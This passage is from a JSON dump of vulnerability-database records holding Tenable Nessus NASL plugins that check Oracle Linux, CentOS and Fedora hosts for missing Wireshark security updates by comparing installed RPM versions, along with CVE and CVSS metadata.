if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which contain Wireshark version 1.0.15, and resolve these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 3 / 4 / 5 : wireshark (ELSA-2010-0625)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2994", "CVE-2010-2995"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:wireshark", "p-cpe:/a:oracle:linux:wireshark-gnome", "cpe:/o:oracle:linux:3", "cpe:/o:oracle:linux:4", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2010-0625.NASL", "href": "https://www.tenable.com/plugins/nessus/68084", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0625 and \n# Oracle Linux Security Advisory ELSA-2010-0625 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68084);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2994\", \"CVE-2010-2995\");\n script_bugtraq_id(39950, 40728);\n script_xref(name:\"RHSA\", value:\"2010:0625\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : wireshark (ELSA-2010-0625)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0625 :\n\nUpdated wireshark packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp\nUniversal Decompressor Virtual Machine (UDVM) dissector. If Wireshark\nread a malformed packet off a network or opened a malicious dump file,\nit could crash or, possibly, execute arbitrary code as the user\nrunning Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2010-1455,\nCVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain Wireshark version 1.0.15, and resolve these issues. All\nrunning instances of Wireshark must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-August/001600.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-August/001601.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-August/001602.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"wireshark-1.0.15-0.1.EL3.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"wireshark-1.0.15-0.1.EL3.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"wireshark-gnome-1.0.15-0.1.EL3.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"wireshark-gnome-1.0.15-0.1.EL3.1\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"wireshark-1.0.15-1.0.1.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"wireshark-gnome-1.0.15-1.0.1.el4_8.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"wireshark-1.0.15-1.0.1.el5_5.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"wireshark-gnome-1.0.15-1.0.1.el5_5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-gnome\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:31", "description": "Updated wireshark packages that fix several security issues are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which contain Wireshark version 1.0.15, and resolve these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2010-08-24T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : wireshark (CESA-2010:0625)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2994", "CVE-2010-2995"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:wireshark", "p-cpe:/a:centos:centos:wireshark-gnome", "cpe:/o:centos:centos:4", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2010-0625.NASL", "href": "https://www.tenable.com/plugins/nessus/48409", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0625 and \n# CentOS Errata and Security Advisory 2010:0625 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48409);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2994\", \"CVE-2010-2995\");\n script_bugtraq_id(39950, 40728);\n script_xref(name:\"RHSA\", value:\"2010:0625\");\n\n script_name(english:\"CentOS 4 / 5 : wireshark (CESA-2010:0625)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated wireshark packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp\nUniversal Decompressor Virtual Machine (UDVM) dissector. If Wireshark\nread a malformed packet off a network or opened a malicious dump file,\nit could crash or, possibly, execute arbitrary code as the user\nrunning Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2010-1455,\nCVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain Wireshark version 1.0.15, and resolve these issues. All\nrunning instances of Wireshark must be restarted for the update to\ntake effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-August/016932.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4ea3370a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-August/016933.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17af990f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-August/016956.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?18b151ef\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-August/016957.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0687cae5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"wireshark-1.0.15-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"wireshark-1.0.15-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"wireshark-gnome-1.0.15-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"wireshark-gnome-1.0.15-1.el4_8.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"wireshark-1.0.15-1.el5_5.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"wireshark-gnome-1.0.15-1.el5_5.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-gnome\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:21", "description": "Update to upstream version 1.2.10: * http://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html * http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html fixing multiple security issues: * http://www.wireshark.org/security/wnpa-sec-2010-06.html * http://www.wireshark.org/security/wnpa-sec-2010-08.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2010-09-03T00:00:00", "type": "nessus", "title": "Fedora 13 : wireshark-1.2.10-1.fc13 (2010-13416)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2995"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2010-13416.NASL", "href": "https://www.tenable.com/plugins/nessus/49092", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-13416.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49092);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2995\");\n script_bugtraq_id(40728, 42618);\n script_xref(name:\"FEDORA\", value:\"2010-13416\");\n\n script_name(english:\"Fedora 13 : wireshark-1.2.10-1.fc13 (2010-13416)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 1.2.10: *\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html *\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html fixing\nmultiple security issues: *\nhttp://www.wireshark.org/security/wnpa-sec-2010-06.html *\nhttp://www.wireshark.org/security/wnpa-sec-2010-08.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.10.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.2.9.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-06.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-06.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-08.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-08.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604302\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=604308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=623843\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-September/046957.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fa9b949\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"wireshark-1.2.10-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-11T16:30:05", "description": "Upgrade to latest release, fixing few security bugs. See http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html and http://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\n\nUpgrade to latest release, fixing few security bugs. See http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-04-27T00:00:00", "type": "nessus", "title": "Fedora 14 : wireshark-1.4.6-1.fc14 (2011-5569)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:wireshark", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-5569.NASL", "href": "https://www.tenable.com/plugins/nessus/53562", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-5569.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53562);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1591\");\n script_xref(name:\"FEDORA\", value:\"2011-5569\");\n\n script_name(english:\"Fedora 14 : wireshark-1.4.6-1.fc14 (2011-5569)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upgrade to latest release, fixing few security bugs. See\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html and\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\n\nUpgrade to latest release, fixing few security bugs. See\nhttp://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.4.5.html\"\n );\n # http://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/docs/relnotes/wireshark-1.4.6.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=697741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=697746\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-April/058983.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bf3f9805\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Wireshark packet-dect.c Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"wireshark-1.4.6-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 